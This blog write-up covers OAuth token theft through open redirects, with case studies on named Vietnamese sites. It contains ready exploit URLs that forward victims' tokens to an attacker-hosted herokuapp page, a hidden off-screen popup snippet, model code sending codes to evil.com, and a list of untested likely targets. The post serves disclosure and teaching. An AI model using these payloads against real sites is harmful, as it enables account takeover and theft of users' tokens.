OAuth token theft using open redirect


OAuth is an authorization framework, commonly used as a single sign-on solution or as the convenient "Log in with Facebook" button. Despite its apparent simplicity and good documentation, it is still easy to misconfigure.

A small mistake in the redirect_uri filter breaks the whole OAuth2 flow. If yourwebsite.com lets redirect_uri point to hackerwebsite.com, an attacker can craft a URL, trick an already-authorized user into visiting it, and steal the session material (authorization code or token) that the provider appends to that URL. A common way to bypass a redirect_uri filter that only checks the host or a prefix is to chain it with an open redirect on the allowed domain: the redirect_uri passes the filter, and the open redirect forwards the browser, with the code or token still attached, to the attacker.

Let's see how this misconfiguration can be exploited on some popular Vietnamese (VN) websites.

Case studies

Every URL below that contains the word "peaceful" points at actual exploit code. Visit them only if you know what you are doing.

Zalo OA

Let's consider Zalo Official Account (OA). After logging in, I used Burp Suite to intercept its authorization process. Basically, it works as follows:

  • Request http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=[3]
  • Check cookies then append uid and code parameters to the URL
  • Authorize user with [2]?callback=[3]&uid=[your-uid]&code=[your-auth-code]
  • Redirect to [3] (Open redirect)

So, by pointing [3] to the attacker's site and appending %23 (a URL-encoded #), the flow becomes:

  • Request http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=http://evil.com%23
  • Check cookies then append uid and code parameters to the URL
  • Authorize user with [2]?callback=http://evil.com/#&uid=[your-uid]&code=[your-auth-code]
  • Then redirect to evil.com/#&uid=[your-uid]&code=[your-auth-code] (everything after the # is a URL fragment: the browser keeps it across the redirect but never sends it to either server, so the client site sees no parameters at all and the attacker's page simply reads them from location.hash)
  • The attacker can now "log in" as the victim with the stolen [your-uid] and [your-auth-code].
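To make the mechanics concrete, here is a model of the flow above, written as an added example for this page (it is not code from the original post and contacts no real service). It models a provider that validates redirect_uri only by prefix, a client callback that forwards to whatever callback= says, a browser that keeps the fragment across the 302, and the attacker's landing page. The hostnames, the registered redirect_uri and the prefix check are assumptions for illustration; the post only shows the resulting URLs. The strict check at the end is the fix: exact match against a pre-registered value.

```javascript
// Added example, not code from the original post. Models the Zalo-style flow
// with Node's URL class; no real service is contacted. Hostnames and the
// registered redirect_uri are placeholders.

// Assumed: the client app registered exactly this redirect_uri with the provider.
const REGISTERED_REDIRECT = 'https://client.example/oauth/cb';

// Weak filter (assumption, consistent with the flow above): any redirect_uri that
// starts with the registered one passes, so "?callback=..." can be appended freely.
function redirectAllowedWeak(redirectUri) {
  return redirectUri.startsWith(REGISTERED_REDIRECT);
}

// Strict filter: exact string match against the registered value. No prefixes,
// no wildcards, no attacker-supplied query string or fragment.
function redirectAllowedStrict(redirectUri) {
  return redirectUri === REGISTERED_REDIRECT;
}

// Provider: after checking the session cookie, append uid and code to the
// (already percent-decoded) redirect_uri and 302 the browser there.
function providerAuthorize(redirectUri, uid, code, allowed) {
  if (!allowed(redirectUri)) throw new Error('redirect_uri rejected');
  const sep = redirectUri.includes('?') ? '&' : '?';
  return `${redirectUri}${sep}uid=${encodeURIComponent(uid)}&code=${encodeURIComponent(code)}`;
}

// Client callback with the open redirect: forwards to whatever callback= says.
// Returns the Location header value (null if the parameter is missing).
function clientCallback(requestUrl) {
  return new URL(requestUrl).searchParams.get('callback');
}

// Browser following a 302. Per RFC 7231 section 7.1.2, when the Location has no
// fragment the user agent keeps the fragment of the URL it is leaving. The
// fragment is never sent to either server.
function follow(currentUrl, location) {
  const next = new URL(location, currentUrl);
  if (!next.hash) next.hash = new URL(currentUrl).hash;
  return next.href;
}

// Attacker's landing page: in a real browser this is location.hash. The leading
// "#&" is stripped and the remainder parsed as query parameters.
function attackerHarvest(landingUrl) {
  const hash = new URL(landingUrl).hash.replace(/^#&?/, '');
  return Object.fromEntries(new URLSearchParams(hash));
}

// Whole chain. The attacker-built redirect_uri is shown after the provider has
// percent-decoded it, i.e. the %23 from the crafted link is already a "#".
function runAttack(allowed, uid = '1234', code = 'AUTHCODE') {
  const redirectUri = `${REGISTERED_REDIRECT}?callback=http://evil.example#`;
  const fromProvider = providerAuthorize(redirectUri, uid, code, allowed);
  const landing = follow(fromProvider, clientCallback(fromProvider));
  return { fromProvider, landing, stolen: attackerHarvest(landing) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = runAttack(redirectAllowedWeak);
  console.log(r.fromProvider); // https://client.example/oauth/cb?callback=http://evil.example#&uid=1234&code=AUTHCODE
  console.log(r.landing);      // http://evil.example/#&uid=1234&code=AUTHCODE
  console.log(r.stolen);       // { uid: '1234', code: 'AUTHCODE' }
  try { runAttack(redirectAllowedStrict); } catch (e) { console.log('strict:', e.message); }
}
```

Note that the client site never even receives uid and code, so server-side logging on the client would show a perfectly normal-looking request; the only place the leak is visible is the victim's browser. The strict comparison rejects the crafted value before any redirect happens, which is the behaviour a provider should have.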

Reported: 04/08/2017

Lazada

Lazada allows users to log in with their Facebook accounts. Using a very professional, complex method commonly known as Googling, I found an open redirect flaw.

"lazada.vn" "redirect"

Easy enough: http://ho.lazada.vn/SHOYax?redirect=[target]. In this case, the target is:

http://ho.lazada.vn/SHOYax?redirect=http://peaceful-basin-79118.herokuapp.com/LazadaPoC.html

Note that, instead of the traditional flow, Lazada uses a slightly modified variant, the HTML5 postMessage flow, with an outdated Facebook SDK: after a user authorizes Lazada with Facebook, the fbsr_[app_id] cookie is set to his/her signed_request. Still, this does not stop an attacker from using the traditional redirect flow to build the payload, asking for response_type=token,signed_request so that both values come back in the URL fragment and survive the open redirect:

https://www.facebook.com/v2.6/dialog/oauth?app_id=1503824746501801
&client_id=1503824746501801&display=popup&
&redirect_uri=http%3A%2F%2Fho.lazada.vn%2FSHOYax%3Fredirect%3Dhttp%3A%2F%2Fpeaceful-basin-79118.herokuapp.com%2FLazadaPoC.html%2F
&response_type=token%2Csigned_request
&scope=public_profile%2Cemail%2Cuser_birthday%2Cuser_friends&sdk=joey&version=v2.6

Reported: 04/08/2017

Viet ID

Looks like the redirect_uri is not filtered at all:

https://oauth.vietid.net/comment/login/enterPassword?cb=https%3A%2F%2Foauth.vietid.net%2Fcomment%2Fauthorize%3Fclient_id%3Dd9c694bd04eb35d96f1d71a84141d075%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FGenericPoC.html%253Fapp_key%253Dd9c694bd04eb35d96f1d71a84141d075%2526clearsession%253D1%26state%3D281d2b8a029e5e351d1413178b1bc92a%26state_uri%3D

5giay and alike

OK, I somewhat cheated: it's not really an open redirect. The following URL asks for confirmation and redirects automatically to the target after 5 seconds if the user doesn't press any button.

www.5giay.vn/redirect.php?[target]

Using a small popup in the corner of the screen, so that the confirmation page stays out of sight, may be a good idea:

// Off-screen 1x1 popup: the victim never sees 5giay's confirmation page.
// redirect_uri is 5giay's redirect.php; its target is the attacker's page ending in a
// double-encoded # (%2523), so once both layers are decoded everything Facebook appends
// after it lands in the URL fragment, the same trick as in the Zalo case.
window.open('https://www.facebook.com/v2.4/dialog/oauth?client_id=525129800895046&scope=public_profile,' +
  'email&state=[attacker_state]&redirect_uri=https%3A%2F%2Fwww.5giay.vn%2Fredirect.php' +
  '%3Fhttp%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FXenForo5giay.html%2523',
  '_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000,top=10000,width=1,height=1,visible=none', '');

The state parameter just makes writing an automated exploit a little harder; it does not stop the attack, since the attacker controls [attacker_state] in the URL above.

More interestingly, after dorking around, I found that a lot of forums like 5giay.vn out there seem vulnerable to this kind of 'attack' as well.

Phimmoi (Failed attempt)

Similar to the Lazada case (the victim might need to have his/her adblocker disabled, since the redirector is served from an ad host):

http://uniad.phimmoi.net/publisher/go/?href=[target]

Although Facebook accepts this as a redirect_uri, the redirector drops everything after the & character (it is parsed as a separate parameter), and the site only uses the code response type, so the code arrives as &code=... in the query string and is lost at the redirector before the browser reaches the attacker's page. Not exploitable.
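The contrast with the Lazada case comes down to where the provider puts the result. The following is an added example for this page (not the post's code) that models it: a Facebook-style provider placing a code in the query string or a token in the fragment, a redirector that honours only its own href parameter, and a browser that keeps the fragment across a 302. Hostnames and the secret value are placeholders.

```javascript
// Added example, not code from the original post. Contrasts response_type=code
// (result in the query string, as at Phimmoi) with response_type=token (result
// in the URL fragment, as in the Lazada payload) through a redirector that keeps
// only its own parameter. Hostnames are placeholders; nothing is contacted.

const ATTACKER = 'https://attacker.example/land.html';

// Provider (Facebook-like): place the result where response_type dictates.
// "code" goes into the query string, the implicit-flow token into the fragment.
function providerRedirect(redirectUri, responseType, secret) {
  if (responseType === 'code') {
    const sep = redirectUri.includes('?') ? '&' : '?';
    return `${redirectUri}${sep}code=${secret}`;
  }
  return `${redirectUri}#access_token=${secret}`;
}

// Redirector of the form /go/?href=<target>: it reads the href parameter only,
// so "&code=..." appended by the provider is parsed as a separate parameter
// and silently dropped from the Location it emits.
function naiveRedirector(requestUrl) {
  return new URL(requestUrl).searchParams.get('href');
}

// Browser following a 302: the fragment of the URL being left is kept when the
// Location carries none (RFC 7231 section 7.1.2) and is never sent to a server.
function follow(currentUrl, location) {
  const next = new URL(location, currentUrl);
  if (!next.hash) next.hash = new URL(currentUrl).hash;
  return next.href;
}

// What reaches the attacker's page for a given response_type. The redirect_uri
// is shown already percent-decoded, as the provider sees it.
function leakedViaRedirector(responseType, secret = 'SECRET') {
  const redirectUri = `https://ads.example/publisher/go/?href=${ATTACKER}`;
  const fromProvider = providerRedirect(redirectUri, responseType, secret);
  const landing = follow(fromProvider, naiveRedirector(fromProvider));
  const u = new URL(landing);
  return {
    landing,
    code: u.searchParams.get('code'),                               // from the query string
    token: new URLSearchParams(u.hash.slice(1)).get('access_token'), // from the fragment
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(leakedViaRedirector('code'));  // landing without code: lost at the redirector
  console.log(leakedViaRedirector('token')); // landing carries #access_token=SECRET
}
```

With response_type=code the redirector's Location contains only the attacker URL, so the code never leaves the ad host's query string; with response_type=token the browser carries the fragment through the 302 untouched, which is exactly why the Lazada payload asks for token,signed_request.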

Bonus

There are even more, but I have been too busy recently (*cough* paying for college *cough* *cough*) to test them all. These websites might make it onto the list (hey, I have not tested them, so don't quote me):

  • http://vtcmobile.vn/oauth (80% sure; quite ironic)
  • https://go.vn/oauth
  • https://vegaid.vn

This article is for educational purposes and customers' safety only.
